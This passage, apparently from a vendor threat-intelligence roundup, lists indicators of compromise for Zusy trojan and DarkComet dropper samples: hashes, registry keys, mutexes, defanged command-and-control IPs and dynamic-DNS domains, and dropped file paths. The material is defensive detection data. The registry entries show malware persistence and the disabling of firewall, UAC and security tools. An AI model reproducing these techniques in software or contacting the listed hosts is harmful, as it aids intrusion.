04e819e635fc974afd4ee533b478841ba581ddcff254034fdbfea6522939ef5f
05b51b8179992a7e21259d9eacdaf8b1115e51056ec0104daddda5a0810f7126
0734ea55ac016a1e6b6ac40837883a684656eec9ce857351c9f99d3c965d6501
07e4ebd0b135dbfcf1e7d2b60386c9b52fa5d154d072a5689eb3a7a2b15112d6
08da477f7c363ddbc11224260717cf6f7f48e849cff403e25559529029b8fdf4
08e9ccb010aceac1ea0c0fbb41e58c8e2552b30de500bf43e298a645f5acedf7
097f9d7400b8a8c8bf5aa5339bf18359148a533f9136cd9b6279623e4db293d7
0bde820541632a300070601291eb1c478b9d09da2b405f740d6fe92b290a45de
0be2e49c02aa297d158bd5fe213a96584455fb4cea7c24dd100b9922df2a45c5
0bf64ebc68956ea9d73858f32530c20fab4243fb09320adfd500fb94842a9888
0c29c2763f311604136a06a99fa76ed09411572cd796021b60c66806e6c8e5a9
0c6b997f98a1e58caf5a16a90317d2cb1d2474ac5c5926f26fa2b14a9299638a
0d30d3c9cf63898bb2e970ec5a54dfe868fc5f519fd6b283bd00a2d22a01a653
0da6c492cc755852c07bf7511b774e2527dce42be420f602e9445f1bb760ad33
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint (screenshot not reproduced here)

Secure Malware Analytics (screenshot not reproduced here)

MITRE ATT&CK (image not reproduced here)

Win.Trojan.Zusy-9960880-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH 12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: MarkTime
12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: Description
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: Type
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: ErrorControl
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: ImagePath
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: DisplayName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: WOW64
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: ObjectName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: FailureActions
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU
Value Name: MarkTime
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: Group
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CDEFGH
Value Name: InstallTime
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF
Value Name: FailureActions
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PQRSTU
Value Name: Type
1
Mutexes Occurrences
127.0.0.1:8000:Cdefgh 3
112.74.89.58:44366:Cdefgh 3
112.74.89.58:42150:Cdefgh 1
47.100.137.128:8001:Pqrstu 1
22.23.24.56:8001:Pqrstu 1
hz122.f3322.org:8001:Cdefgh 1
112.74.89.58:35807:Cdefgh 1
112.74.89.58:46308:Cdefgh 1
101.33.196.136:3389:Cdefgh 1
127.0.0.1:8001:Cdefgh 1
183.28.28.43:8001:Abcdef 1
IP Addresses contacted by malware (does not indicate maliciousness) Occurrences
112[.]74[.]89[.]58 6
22[.]23[.]24[.]56 1
47[.]100[.]137[.]128 1
101[.]33[.]196[.]136 1
183[.]28[.]28[.]43 1
Domain Names contacted by malware (does not indicate maliciousness) Occurrences
hz122[.]f3322[.]org 1
Files and/or directories created Occurrences
%SystemRoot%\svchost.exe 4

File Hashes

04fa031e5d2d86f8dbe0d3b95d67ea774448df4613e8acce79f0c9a30ef041bc
2444b744b5c06e9410ee5c3baa807569fde44c5092192428de935e03d25b1edb
466ca0805173034a7b12a5ffce104bbe5ed312e7441abdb98849ae4103150d04
5a755f07d3b90ac5a2041fd04fd764c40882dd20b50f91fddbc10b8c6341591d
5b53262a14fe1dcd42d670b0488d0de11aeb7cfa84e36acb4eec0c13b5fd2d73
5ca6b22c6e7de5f0b9437970f1f9360ad4f3a74f964eb319080e347c27c6dff9
6ea5fdaa95dbe09ccbc474ba4fc9fbe796e79c02d2b4f65f223feda5643f5400
86bd70bc7bb74d3d4991b0f1c7e15ddef1d09695b3940c5fb015f2d00ce5f558
b9b344bd7005b233cbb85395f61c309938fe70e2f8a8d0b2c24441ba074f9ca5
bea6c7b4117eb1f894d830c77ddf6d4424bccb6043d0f43c257522d253321c3e
c0a8a6e606e46a970cefe81f269ec6aec2a538830c2f7e03cf0eac55b135a59a
c968ae3cfbbd89673b49f6bfd474eea846bdb1e2e3a7c5376dbcda5290d445ed
dfc315d962da82d84b54683a849edf4e7b16bb136dbc2eb1198d35e528920103
ec6cb8ff27e33d7e69ce02885baa9c08fd5a03349a16a52590353a4ec364c464
f240b80b34fa480dc7236ddecb5c326e719a094e49df5a6f2070712650553066
fd0e616e5ebb9075c44bb6772cf8b2c46801fafdb0716636850dc2ec0fe06f8c

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

Secure Endpoint (screenshot not reproduced here)

Secure Malware Analytics (screenshot not reproduced here)

MITRE ATT&CK (image not reproduced here)

Win.Dropper.DarkComet-9961766-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 33 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\DC3_FEXEC 29
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Debugger
24
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
23
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svchost.exe
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableRegistryTools
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: rundll32
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN
Value Name: NoControlPanel
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Microsoft
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Updater
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Update
1
Mutexes Occurrences
DC_MUTEX-<random, matching [A-Z0-9]{7}> 22
DCPERSFWBP 18
DC_MUTEX-5DND8AT 7
IP Addresses contacted by malware (does not indicate maliciousness) Occurrences
99[.]229[.]175[.]244 1
Domain Names contacted by malware (does not indicate maliciousness) Occurrences
pervert[.]no-ip[.]info 7
pervert2[.]no-ip[.]info 7
delvega[.]no-ip[.]org 2
wp-enhanced[.]no-ip[.]org 2
funstuff712[.]zapto[.]org 2
fflazhhf1[.]no-ip[.]org 1
darkcometss[.]no-ip[.]org 1
not4umac[.]no-ip[.]biz 1
sanderkidah[.]no-ip[.]org 1
bobolobob[.]no-ip[.]biz 1
hg-ma[.]zapto5[.]org 1
corrosivegas2010[.]zapto[.]org 1
profi555[.]no-ip[.]org 1
hg-ma[.]zapto[.]org 1
jugoboy1[.]zapto[.]org 1
hg-ma[.]zapto1[.]org 1
hg-ma[.]zapto2[.]org 1
hg-ma[.]zapto3[.]org 1
hg-ma[.]zapto4[.]org 1
jackreapez[.]zapto[.]org 1
magicmq[.]no-ip[.]org 1
kenrickm[.]no-ip[.]org 1
mrganja[.]no-ip[.]org 1
cherubi[.]no-ip[.]org 1
Files and/or directories created Occurrences
%APPDATA%\WinDbg 30
%APPDATA%\WinDbg\windbg.exe 29
%APPDATA%\dclogs 28
\svchost.exe 7
%TEMP%\uxcv9v 7
%TEMP%\uxcv9v.vbs 7
%HOMEPATH%\Documents\MSDCSC 6
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe 6
%TEMP%\MSDCSC 5
%TEMP%\MSDCSC\msdcsc.exe 5
%SystemRoot%\SysWOW64\MSDCSC 3
%SystemRoot%\SysWOW64\MSDCSC\msdcsc.exe 3
%TEMP%\tMMjnM 1
%TEMP%\xMWbLz.vbs 1
%TEMP%\tMMjnM.vbs 1
%APPDATA%\WinDbg\msdnaa.exe 1
%TEMP%\Mi0z67 1
%HOMEPATH%\Documents\Explorer\Iexplorer.exe 1